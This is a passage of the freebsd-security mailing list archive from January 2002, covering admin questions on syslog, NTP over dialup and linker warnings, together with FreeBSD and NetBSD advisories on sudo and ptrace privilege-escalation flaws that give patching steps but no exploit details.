with FreeBSD, it wouldn't work. > Not sure what it is i'm missing. I've HUP'ed every service, and read what > I could, but it sitll fails to log. You HUPed syslogd(8) too, right? You could try running it in debug mode (-d) to see what is up. > Is this not a feature? or am I just > missing something simple? With relation to my first comment, understand what "blocks" are in the syslog.conf(5) manpage and make sure your added line is in the right place. -- "It's always funny until someone gets hurt. Then it's hilarious." Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 15 20:37:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from netau1.alcanet.com.au (ntp.alcanet.com.au [203.62.196.27]) by hub.freebsd.org (Postfix) with ESMTP id C3BD737B405 for ; Tue, 15 Jan 2002 20:37:14 -0800 (PST) Received: from mfg1.cim.alcatel.com.au (mfg1.cim.alcatel.com.au [139.188.23.1]) by netau1.alcanet.com.au (8.9.3 (PHNE_22672)/8.9.3) with ESMTP id PAA29274 for ; Wed, 16 Jan 2002 15:37:13 +1100 (EDT) Received: from gsmx07.alcatel.com.au by cim.alcatel.com.au (PMDF V5.2-32 #37645) with ESMTP id <01KD57128C685IJCVN@cim.alcatel.com.au> for freebsd-security@freebsd.org; Wed, 16 Jan 2002 15:37:32 +1100 Received: (from jeremyp@localhost) by gsmx07.alcatel.com.au (8.11.6/8.11.6) id g0G4b8574244 for freebsd-security@freebsd.org; Wed, 16 Jan 2002 15:37:08 +1100 Content-return: prohibited Date: Wed, 16 Jan 2002 15:37:08 +1100 From: Peter Jeremy Subject: Firewalls + NTP + dialup problems To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-security@freebsd.org Message-id: <20020116153707.C72285@gsmx07.alcatel.com.au> MIME-version: 1.0 Content-type: text/plain; charset=us-ascii Content-disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm having a problem running NTP over a dialup link between two hosts with fairly strict packet filtering. Both machines are running 4.4-STABLE from mid-December (just before the 4.5 freeze). +------+ +------+ +------+ +------+ | | enet | | ppp | | enet | | | net1 |-------|host1 |-------|host2 |-------| net2 | | | | | | | | | +------+ +------+ +------+ +------+ "ppp" is a dial-on-demand link that is initiated by host1 using ppp(8). "enet" are the ethernet links to the LANs (net1 and net2). "host2.ppp" refers to the IP address of the PPP interface on host2 etc. ppp(8) on host2 is configured using "Method 2" from the man page (ppp is started using getty's "pp" capability). Both hosts have a mixture of ipfw and PPP filter rules intended to restrict access from host2 and net2 to host1 and net1. All four sets of rules restrict PPP traffic to host1.ppp<->host2.ppp. Both hosts have each other listed as an NTP peer (along with other machines). The problem I've got is that when host2 reboots, there is no PPP connection and therefore host2.ppp doesn't exist (ppp ifconfig's it into existence when it gets an incoming call from host1). This means that ntpd only binds to host2.enet and host2.lo0. NTP packets from host2 to host1 have a source address of host2.enet - which is blocked by the firewall rules. So far, I've thought of the following: 1) Allow the address host2.enet on the PPP link. I don't like (or want to implement) this. 2) Make ntpd notice when host2.ppp is created and bind to it. ntpd(8) doesn't appear to have any suitable signal's trapped and the code to creat and bind sockets only appears to be invoked during initialisation. 3) Have host2.ppp always exist so ntpd can bind to it when it starts. I can't see any obvious way to achieve this. "ifconfig tun0" will create the address, but ppp then whinges and will delete the address when the link drops. Can anyone else offer any suggestions? Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 15 23:56:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from hitit.bimel.com.tr (hitit.bimel.com.tr [212.175.97.140]) by hub.freebsd.org (Postfix) with ESMTP id ED90437B41C for ; Tue, 15 Jan 2002 23:56:25 -0800 (PST) Received: (from root@localhost) by hitit.bimel.com.tr (8.11.6/8.11.6) id g0G7wM738849 for freebsd-security@freebsd.org; Wed, 16 Jan 2002 09:58:22 +0200 (EET) (envelope-from simsek@bimel.com.tr) Received: from localhost (simsek@localhost) by hitit.bimel.com.tr (8.11.6/8.11.6av) with ESMTP id g0G7wGS38839 for ; Wed, 16 Jan 2002 09:58:21 +0200 (EET) (envelope-from simsek@bimel.com.tr) X-Authentication-Warning: hitit.bimel.com.tr: simsek owned process doing -bs Date: Wed, 16 Jan 2002 09:58:16 +0200 (EET) From: Baris Simsek To: Subject: newsyslog problem Message-ID: <20020116095136.I37632-100000@hitit.bimel.com.tr> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org hi, i know, this is not interested in this list directly. When newsyslog rotate my /var/log/messages file, named stops. Here is related line in /etc/newsyslog.conf: /var/log/messages root.wheel 640 7 12000 * Z if named doesnt work, i check it by 'cat /var/log/messages'. There ara only this line: Nov 6 10:55:00 srv3 newsyslog[31917]: logfile turned over I understand that, when log file turns, named stops. so what is problem? thx... best regards, -- - barI$ - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 16 3: 9:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from draco.over-yonder.net (draco.over-yonder.net [198.78.58.61]) by hub.freebsd.org (Postfix) with ESMTP id 0A63737B404; Wed, 16 Jan 2002 03:09:14 -0800 (PST) Received: by draco.over-yonder.net (Postfix, from userid 100) id E1899FC5; Wed, 16 Jan 2002 05:09:12 -0600 (CST) Date: Wed, 16 Jan 2002 05:09:12 -0600 From: "Matthew D. Fuller" To: Kris Kennaway Cc: Alfred Perlstein , Buliwyf McGraw , freebsd-security@FreeBSD.ORG Subject: Re: gets() is unsafe Message-ID: <20020116050912.P23043@over-yonder.net> References: <20020114151955.I26067@elvis.mu.org> <20020115082216.A792@citusc17.usc.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5-fullermd.1i In-Reply-To: <20020115082216.A792@citusc17.usc.edu>; from kris@FreeBSD.ORG on Tue, Jan 15, 2002 at 08:22:16AM -0800 X-Editor: vi X-OS: FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jan 15, 2002 at 08:22:16AM -0800 I heard the voice of Kris Kennaway, and lo! it spake thus: > > * Buliwyf McGraw [020114 14:49] wrote: > > > > > > Hi... i was installing several applications (php,xmms,etc) on my > > > FreeBSD 4.4 server and i got the next message a lot of times when > > > i was compiling: ^^^^^^^^^ > > > /usr/lib/compat/libc.so.3: warning: mktemp() possibly used unsafely; > > > consider using mkstemp() > > > /usr/lib/compat/libc.so.3: warning: tmpnam() possibly used unsafely; > > > consider using mkstemp() [...] > No, this is a FAQ; it's a bug in the linker which causes it to trip > every single _warn_references() in the library when it links to libc, > regardless of whether the program actually uses the functions in > question. I think it's an even better FAQ: Why, when he's compiling, is it linking against a compat/libc? -- Matthew Fuller (MF4839) | fullermd@over-yonder.net Unix Systems Administrator | fullermd@futuresouth.com Specializing in FreeBSD | http://www.over-yonder.net/ "The only reason I'm burning my candle at both ends, is because I haven't figured out how to light the middle yet" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 16 7:46:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mafalda.univalle.edu.co (mafalda.univalle.edu.co [200.68.158.10]) by hub.freebsd.org (Postfix) with ESMTP id AE2C037B417 for ; Wed, 16 Jan 2002 07:46:31 -0800 (PST) Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [192.168.18.91]) by mafalda.univalle.edu.co (8.12.1/8.12.1) with ESMTP id g0GDmol7013613 for ; Wed, 16 Jan 2002 08:48:51 -0500 (GMT) Received: from libertad.univalle.edu.co (buliwyf@localhost.univalle.edu.co [127.0.0.1]) by libertad.univalle.edu.co (8.12.1/8.12.1) with ESMTP id g0GDueJI060223 for ; Wed, 16 Jan 2002 08:56:40 -0500 (COT) Received: from localhost (buliwyf@localhost) by libertad.univalle.edu.co (8.12.1/8.12.1/Submit) with ESMTP id g0GDuegA060220 for ; Wed, 16 Jan 2002 08:56:40 -0500 (COT) Date: Wed, 16 Jan 2002 08:56:40 -0500 (COT) From: Buliwyf McGraw To: freebsd-security@FreeBSD.ORG Subject: Re: gets() is unsafe (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Kris Kennaway, and lo! it spake thus: > > * Buliwyf McGraw [020114 14:49] wrote: > > > > > > Hi... i was installing several applications (php,xmms,etc) on my > > > FreeBSD 4.4 server and i got the next message a lot of times when > > > i was compiling: ^^^^^^^^^ > > > /usr/lib/compat/libc.so.3: warning: mktemp() possibly used unsafely; > > > consider using mkstemp() > > > /usr/lib/compat/libc.so.3: warning: tmpnam() possibly used unsafely; > > > consider using mkstemp() [...] > > No, this is a FAQ; it's a bug in the linker which causes it to trip > > every single _warn_references() in the library when it links to libc, > > regardless of whether the program actually uses the functions in > > question. > I think it's an even better FAQ: Why, when he's compiling, is it linking > against a compat/libc? Ok... i have to say that i am not an expert on FreeBSD, just a new admin... I installed FreeBSD 4.4 on my box (in some way, "everything by default")... and then i started to install some applications (apache,php,etc), not with the /stand/sysinstall utility, but in the traditional way: - Download the *.tar.gz - Uncompress, configure, make, make install I expected no problems... but as you can see, the warning messages give an "insecure" sensation. I want to do something to avoid that messages when i try to compile a GNU application. Thanks for your comments and help. ======================================================================= Buliwyf McGraw Administrador del Servidor Libertad Centro de Servicios de Informacion Universidad del Valle ======================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 16 15:15:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8FCFE37B41A; Wed, 16 Jan 2002 15:15:33 -0800 (PST) Received: (from nectar@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g0GNFX257696; Wed, 16 Jan 2002 15:15:33 -0800 (PST) (envelope-from security-advisories@freebsd.org) Date: Wed, 16 Jan 2002 15:15:33 -0800 (PST) Message-Id: <200201162315.g0GNFX257696@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: nectar set sender to security-advisories@freebsd.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory FreeBSD-SA-02:06.sudo Reply-To: security-advisories@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-02:06 Security Advisory FreeBSD, Inc. Topic: sudo port may enable local privilege escalation Category: ports Module: sudo Announced: 2002-01-16 Credits: Sebastian Krahmer Affects: Ports collection prior to the correction date Corrected: 2002-01-15 02:56:33 UTC FreeBSD only: NO I. Background Sudo is a program designed to allow a sysadmin to give limited root privileges to users and log root activity. II. Problem Description The sudo port, versions prior to sudo-1.6.4.1, contains a vulnerability that may allow a local user to obtain superuser privileges. If a user who has not been authorized by the system administrator (listed in the `sudoers' file) attempts to use sudo, sudo will send an email alert. When it does so, it invokes the system mailer with superuser privileges, and with most of the user's environment intact. The sudo port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 6000 third-party applications in a ready-to-install format. The ports collection shipped with FreeBSD 4.4 contains this problem since it was discovered after the release. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact If the system mailer's behavior can be influenced by the settings of environmental variables, then an attacker may obtain superuser privileges. There is at least one mailer (postfix) that can be influenced in this fashion. IV. Workaround 1) Deinstall the sudo port/package if you have it installed. V. Solution 1) Upgrade your entire ports collection and rebuild the port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from the following directories: [i386] ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/security/sudo-1.6.4.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/security/sudo-1.6.4.1.tgz [alpha] Packages are not automatically generated for the alpha architecture at this time due to lack of build resources. NOTE: It may be several days before updated packages are available. 3) Download a new port skeleton for the sudo port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz VI. Correction details The following list contains the revision numbers of each file that was corrected in the FreeBSD ports collection. Path Revision - ------------------------------------------------------------------------- ports/security/sudo/Makefile 1.43 ports/security/sudo/distinfo 1.26 - ------------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBPEYIq1UuHi5z0oilAQEgTAP/YXD+lSngGwbloUn09xvwgn8i5uGaEX5O Rj1v7XM3HRT/Gmr1CJiK7LtMbj/iilHzC2YiTAUHyxYzdEU7k9SnLgxK6rcSYNql 5wkYL1asHQhFPYejEqQVPKejrr4L/+/bYmQbkLKc9EMdErnhYoNrw6QbN+XvmO6p oAzSK07ixi4= =rmb8 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 16 16: 7:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 1983F37B400 for ; Wed, 16 Jan 2002 16:07:37 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.6/8.11.4) id g0H05p005962; Wed, 16 Jan 2002 16:05:51 -0800 (PST) (envelope-from kris) Date: Wed, 16 Jan 2002 16:05:50 -0800 From: Kris Kennaway To: Buliwyf McGraw Cc: freebsd-security@FreeBSD.ORG Subject: Re: gets() is unsafe (fwd) Message-ID: <20020116160550.A5927@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="xHFwDpU9dbj6ez1V" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from buliwyf@libertad.univalle.edu.co on Wed, Jan 16, 2002 at 08:56:40AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --xHFwDpU9dbj6ez1V Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Wed, Jan 16, 2002 at 08:56:40AM -0500, Buliwyf McGraw wrote: > > > No, this is a FAQ; it's a bug in the linker which causes it to trip > > > every single _warn_references() in the library when it links to libc, > > > regardless of whether the program actually uses the functions in > > > question. > I expected no problems... but as you can see, the warning messages give > an "insecure" sensation. > I want to do something to avoid that messages when i try to compile a GNU > application. > Thanks for your comments and help. I've already told you that this situation is a bug in the toolchain and not a security problem. Kris --xHFwDpU9dbj6ez1V Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE8RhVeWry0BWjoQKURAqPLAKCIpWbPPO7vwVYXueYwPOtC0g6CBwCbBDEw 6usms2hzou8RPtYarjYLpyY= =lPxU -----END PGP SIGNATURE----- --xHFwDpU9dbj6ez1V-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 16 16:19:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id 28F2837B400 for ; Wed, 16 Jan 2002 16:19:17 -0800 (PST) Received: from velvet.zaraska.dhs.org (velvet.zaraska.dhs.org [192.168.11.2]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with ESMTP id 4E9FA1DA7; Thu, 17 Jan 2002 01:16:18 +0100 (CET) Received: from velvet.zaraska.dhs.org (velvet.zaraska.dhs.org [127.0.0.1]) by velvet.zaraska.dhs.org (8.11.2/8.11.2) with SMTP id g0H0G4s01259; Thu, 17 Jan 2002 01:16:04 +0100 Date: Thu, 17 Jan 2002 01:16:04 +0100 From: Krzysztof Zaraska To: "Buliwyf McGraw" Cc: freebsd-security@freebsd.org Subject: Re: gets() is unsafe (fwd) Message-Id: <20020117011604.6e5291da.kzaraska@student.uci.agh.edu.pl> In-Reply-To: References: Organization: University Of Mining And Metallurgy X-Mailer: Sylpheed version 0.6.2 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 16 Jan 2002 08:56:40 -0500 (COT) Buliwyf McGraw wrote: > Kris Kennaway, and lo! it spake thus: > > > * Buliwyf McGraw [020114 14:49] wrote: > > > > > > > > Hi... i was installing several applications (php,xmms,etc) on my > > > > FreeBSD 4.4 server and i got the next message a lot of times when > > > > i was compiling: > ^^^^^^^^^ > > > > /usr/lib/compat/libc.so.3: warning: mktemp() possibly used unsafely; > > > > consider using mkstemp() > > > > /usr/lib/compat/libc.so.3: warning: tmpnam() possibly used unsafely; > > > > consider using mkstemp() > [...] > > > > No, this is a FAQ; it's a bug in the linker which causes it to trip > > > every single _warn_references() in the library when it links to libc, > > > regardless of whether the program actually uses the functions in > > > question. > > > I think it's an even better FAQ: Why, when he's compiling, is it linking > > against a compat/libc? > > Ok... i have to say that i am not an expert on FreeBSD, just a new > admin... I installed FreeBSD 4.4 on my box (in some way, "everything by > default")... and then i started to install some applications (apache,php,etc), > not with the /stand/sysinstall utility, but in the traditional way: > - Download the *.tar.gz > - Uncompress, configure, make, make install > > I expected no problems... but as you can see, the warning messages give > an "insecure" sensation. > I want to do something to avoid that messages when i try to compile a GNU > application. > Thanks for your comments and help. OK, I'm not an expert here either, but anyhow... I've been doing some FreeBSD porting/programming recently and I found that these (or similar) warning simply pop up when you use an insecure function in your code. Try compiling a 'Hello World'-like application that uses mktemp() or gets(). You'll get a warning, while the same code compiles cleanly on Linux. So it seems, that such warnings are issued every time linker hits a function that is 'tagged' as insecure. I guess this is an attempt to help programmers in secure programming :) I guess some of your programs make use of these insecure functions, so the compiler warns you about that. Of course the fact that someone used an insecure function does not necessary mean that the program is automatically insecure; everything depends on how it is used. Besides, if you are installing standard applications, why don't you go to /usr/ports and start from there? E.g. cd /usr/ports/www/apache13 && make install will install Apache for you. You'll get a version already patched for FreeBSD. Krzysztof To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 16 18:10:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id CB35837B419 for ; Wed, 16 Jan 2002 18:10:36 -0800 (PST) Received: (from root@localhost) by cage.simianscience.com (8.11.6/8.11.6) id g0H2AZf19823 for security@freebsd.org; Wed, 16 Jan 2002 21:10:35 -0500 (EST) (envelope-from mike@sentex.net) Received: from house.sentex.net (fcage [192.168.0.2]) by cage.simianscience.com (8.11.6/8.11.6av) with ESMTP id g0H2AV319815 for ; Wed, 16 Jan 2002 21:10:32 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20020116211004.0269d600@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 16 Jan 2002 21:11:06 -0500 To: security@freebsd.org From: Mike Tancsa Subject: Fwd: NetBSD Security Advisory 2002-001 Close-on-exec, SUID and ptrace(2) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org There is mention of other BSDs as well in the advisory below. Was/is this an old issue for FreeBSD or one that is currently relevant ? ---Mike >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >List-Id: >List-Post: >List-Help: >List-Unsubscribe: >List-Subscribe: >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >Date: Wed, 16 Jan 2002 13:04:32 -0500 >From: NetBSD Security Officer >To: bugtraq@securityfocus.com >Subject: NetBSD Security Advisory 2002-001 Close-on-exec, SUID and ptrace(2) >Reply-To: NetBSD Security Officer >User-Agent: Mutt/1.2.5.1i >Organisation: The NetBSD Foundation, Inc. >X-Virus-Scanned: by AMaViS perl-10 > > >-----BEGIN PGP SIGNED MESSAGE----- > > > NetBSD Security Advisory 2002-001 > ================================= > >Topic: Close-on-exec, SUID and ptrace(2) > >Version: NetBSD-current: prior to January 14, 2002 > NetBSD-1.5.*: affected up to and including 1.5.2 > NetBSD-1.4.*: affected up to and including 1.4.3 > >Severity: local root privilege compromise > >Fixed: NetBSD-current: January 14, 2002 > NetBSD-1.5 branch: January 14, 2002 > NetBSD-1.4 branch: January 14, 2002 > > >Abstract >======== > >A process could exec a setuid binary, while gaining ptrace control >over it for a short period before the process was activated. The >ptrace controller process could then modify the address space of the >controlled process and abuse its elevated privileges. > >Technical Details >================= > >The opportunity for abuse is similar to the issues in NetBSD-SA2001-009, >though the cause is different. A race condition existed which allowed >bypassing of the usual restrictions against using ptrace on setugid >processes. > >Since there is no known public exploit of this issue, and it is known to >affect other BSDs it would be a public disservice to provide further >insight at this time. > >A patch is being included for procfs which can be exploited in a similar >fashion. > >Note that the ptrace portion of this advisory affects all kernels, not >only kernels with particular options, such as procfs. > >Solutions and Workarounds >========================= > >The only workaround available is to disable all logins by untrusted >users. The race should still be patched, since it would allow elevation >to root privileges if some other vulnerability allowed a non-privileged >account to be compromised. > >Since all recent NetBSD versions are affected, anyone who grants or has >granted >user accounts to untrusted users on their systems should apply the patch for >this issue immediately. > >While initial tests against earlier versions such as NetBSD-1.3.x were >unsuccessful, it is still expected that this issue would apply to these older >versions as well. It is strongly recommended that systems running >NetBSD-1.3.x and earlier be upgraded to a more recent release for many >security and performance reasons. > >The following instructions describe how to upgrade your kernel by >updating your source tree or patching it. > >* NetBSD-current: > > Systems running NetBSD-current dated from before 2002-01-14 > should be upgraded to NetBSD-current dated 2002-01-15 or later. > > The following files need to be updated from the > netbsd-current CVS branch (aka HEAD): > sys/kern/kern_exec.c > sys/kern/sys_process.c > sys/sys/proc.h > sys/miscfs/procfs/procfs_ctl.c > sys/miscfs/procfs/procfs_mem.c > sys/miscfs/procfs/procfs_regs.c > sys/miscfs/procfs/procfs_vnops.c > > To update your kernel sources from CVS: > # cd src > # cvs update -d -P sys/kern/kern_exec.c > # cvs update -d -P sys/kern/sys_process.c > # cvs update -d -P sys/sys/proc.h > # cvs update -d -P sys/miscfs/procfs/procfs_ctl.c > # cvs update -d -P sys/miscfs/procfs/procfs_mem.c > # cvs update -d -P sys/miscfs/procfs/procfs_regs.c > # cvs update -d -P sys/miscfs/procfs/procfs_vnops.c > > Then build and install a new kernel. If you are not familiar > with this process, documentation is available at: > > >http://www.netbsd.org/Documentation/kernel/#how_to_build_a_kernel > >* NetBSD 1.5, 1.5.1, 1.5.2: > > Systems running NetBSD 1.5-branch sources dated from > before 2002-01-14 should be upgraded from NetBSD 1.5-branch > sources dated 2002-01-15 or later. > > The following files need to be updated from the > netbsd-1-5 CVS branch: > sys/kern/kern_exec.c > sys/kern/sys_process.c > sys/sys/proc.h > sys/miscfs/procfs/procfs_ctl.c > sys/miscfs/procfs/procfs_mem.c > sys/miscfs/procfs/procfs_regs.c > > To update your existing checkout of 1.5-branch kernel sources > from CVS: > > # cd src > # cvs update -d -P sys/kern/kern_exec.c > # cvs update -d -P sys/kern/sys_process.c > # cvs update -d -P sys/sys/proc.h > # cvs update -d -P sys/miscfs/procfs/procfs_ctl.c > # cvs update -d -P sys/miscfs/procfs/procfs_mem.c > # cvs update -d -P sys/miscfs/procfs/procfs_regs.c > # cvs update -d -P sys/miscfs/procfs/procfs_vnops.c > > Then build and install a new kernel. If you are not familiar > with this process, documentation is available at: > > >http://www.netbsd.org/Documentation/kernel/#how_to_build_a_kernel > > Alternatively, apply the following patch (with potential offset > differences): > > >ftp://ftp.netbsd.org/pub/NetBSD/security/patches/SA2002-001-ptrace-1.5.patch > > To patch: > > # cd src > # patch < /path/to/SA2002-001-ptrace-1.5.patch > > Then build and install a new kernel. If you are not familiar > with this process, documentation is available at: > > >http://www.netbsd.org/Documentation/kernel/#how_to_build_a_kernel > > >* NetBSD 1.4, 1.4.1, 1.4.2, 1.4.3: > > Apply the following patch (with potential offset differences): > > >ftp://ftp.netbsd.org/pub/NetBSD/security/patches/SA2002-001-ptrace-1.4.patch > > To patch: > > # cd src > # patch < /path/to/SA2002-001-ptrace-1.4.patch > > Then build and install a new kernel. If you are not familiar > with this process, documentation is available at: > > >http://www.netbsd.org/Documentation/kernel/#how_to_build_a_kernel > > >Thanks To >========= > >Havard Eidnes and Christos Zoulas for work on the patches, and >Tor Egge of FreeBSD for raising the issue. > > >Revision History >================ > > 2002-01-16 Initial release > > >More Information >================ > >An up-to-date PGP signed copy of this release will be maintained at > >ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-001.txt.asc > >Information about NetBSD and NetBSD security can be found at >http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/. > > >Copyright 2002, The NetBSD Foundation, Inc. All Rights Reserved. > >$NetBSD: NetBSD-SA2002-001.txt,v 1.6 2002/01/16 06:28:08 david Exp $ > >-----BEGIN PGP SIGNATURE----- >Version: GnuPG v1.0.6 (NetBSD) >Comment: For info see http://www.gnupg.org > >iQCVAwUBPEWdsD5Ru2/4N2IFAQFAlQP8DrpewEgC/72QqEd0WKSHUS6AWh8jaXcf >5Uq3torY6Cuk/C0jlhbbSo+PKdxPbtdmhUDP+7WMcVcGQbNwGI0/sbVj2fS0u5Cq >nm/EQZ8eNf4XudC/CMkpinP2Oid+8K032Mh1b7HiD1UQeE/Nd96X0xEQ4fIRebqt >AGnGymrlWyc= >=vLoR >-----END PGP SIGNATURE----- -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 16 18:31:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from TYO201.gate.nec.co.jp (TYO201.gate.nec.co.jp [202.32.8.214]) by hub.freebsd.org (Postfix) with ESMTP id 913FD37B404 for ; Wed, 16 Jan 2002 18:31:15 -0800 (PST) Received: from mailgate4.nec.co.jp ([10.7.69.193]) by TYO201.gate.nec.co.jp (8.11.6/3.7W01080315) with ESMTP id g0H2V4f12824; Thu, 17 Jan 2002 11:31:04 +0900 (JST) Received: from mailsv.nec.co.jp (mailgate51.nec.co.jp [10.7.69.190]) by mailgate4.nec.co.jp (8.11.6/3.7W-MAILGATE-NEC) with ESMTP id g0H2V3C26295; Thu, 17 Jan 2002 11:31:03 +0900 (JST) Received: from necspl.do.mms.mt.nec.co.jp (necspl.do.mms.mt.nec.co.jp [10.16.5.21]) by mailsv.nec.co.jp (8.11.6/3.7W-MAILSV-NEC) with ESMTP id g0H2UxK09941; Thu, 17 Jan 2002 11:31:00 +0900 (JST) Received: from localhost (localhost [127.0.0.1]) by necspl.do.mms.mt.nec.co.jp (8.12.2/8.12.2) with ESMTP id g0H2UtcB058418; Thu, 17 Jan 2002 11:30:59 +0900 (JST) Date: Thu, 17 Jan 2002 11:30:55 +0900 (JST) Message-Id: <20020117.113055.130199478.y-koga@jp.FreeBSD.org> To: freebsd-security@FreeBSD.ORG Subject: at command heap corruption vuln. From: Koga Youichirou X-Mailer: Mew version 3.0.52 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Debian and SuSE announced that "at" command leads into a heap corruption. Does anyone know if this problem affects FreeBSD? Debian: http://www.debian.org/security/2002/dsa-102 SuSE: http://www.linuxsecurity.com/advisories/suse_advisory-1817.html Debian's 